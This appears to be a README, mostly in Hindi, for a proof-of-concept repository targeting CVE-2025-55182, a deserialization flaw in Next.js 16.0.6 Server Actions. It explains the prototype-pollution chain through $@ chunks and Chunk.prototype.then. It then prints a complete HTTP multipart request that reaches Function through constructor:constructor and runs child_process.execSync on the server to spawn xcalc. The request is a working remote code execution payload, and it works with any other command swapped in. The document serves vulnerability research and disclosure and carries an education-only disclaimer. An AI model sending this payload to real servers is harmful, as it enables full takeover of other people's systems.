
More exploit-focused; great for security research repos.
इस रिपॉजिटरी में CVE-2025-55182 के लिए एक कार्यशील प्रूफ-ऑफ-कॉन्सेप्ट (POC) शामिल है, जो Next.js 16.0.6 को प्रभावित करने वाली एक गंभीर डिसीरियलाइजेशन कमजोरी है।
यह शोषण $@ चंक डिसीरियलाइजेशन और Chunk.prototype.then का दुरुपयोग करके चंक रिज़ॉल्यूशन प्रक्रिया पर पूर्ण नियंत्रण प्राप्त करता है और सर्वर पर मनमाना कोड निष्पादन (RCE) प्राप्त करता है।
Next.js सर्वर एक्शन के लिए आंतरिक Chunk ऑब्जेक्ट और स्ट्रीमिंग/डिसीरियलाइजेशन तंत्र का उपयोग करता है।
$@ का दुरुपयोग करके Chunk संदर्भ को डिसीरियलाइज़ करके और रूट ऑब्जेक्ट में Chunk.prototype.then इंजेक्ट करके, एक हमलावर निम्नलिखित कर सकता है:
this के साथ then(...) कॉल करने के लिए मजबूर कर सकता हैstatus को resolved_model पर सेट कर सकता हैinitializeModelChunk ट्रिगर कर सकता हैchunk._response विधियों का दुरुपयोग कर सकता हैअंतिम लक्ष्य Blob डिसीरियलाइजेशन को ट्रिगर करना है, जो इस तरह का कॉल निष्पादित करता है:
response._formData.get(response._prefix)
response._formData.get = Function सेट करके और response._prefix में मनमाना कोड डालकर, हमलावर मनमाना सिस्टम कमांड निष्पादित कर सकता है।
poc/CVE-2025-55182.http में HTTP अनुरोध स्थानीय रूप से चल रहे Next.js 16.0.6 के विरुद्ध शोषण प्रदर्शित करता है, जो child_process.execSync के माध्यम से xcalc स्पॉन करता है:
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
/
├── README.md
├── DISCLAIMER.md
├── poc/
│ └── CVE-2025-55182.http
└── analysis/
└── exploitation-notes.md
यह प्रोजेक्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। किसी भी सिस्टम पर इस शोषण का उपयोग न करें जिसके आप मालिक नहीं हैं या जिसके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है।
लेखक किसी भी दुरुपयोग या क्षति के लिए कोई जिम्मेदारी नहीं लेता है।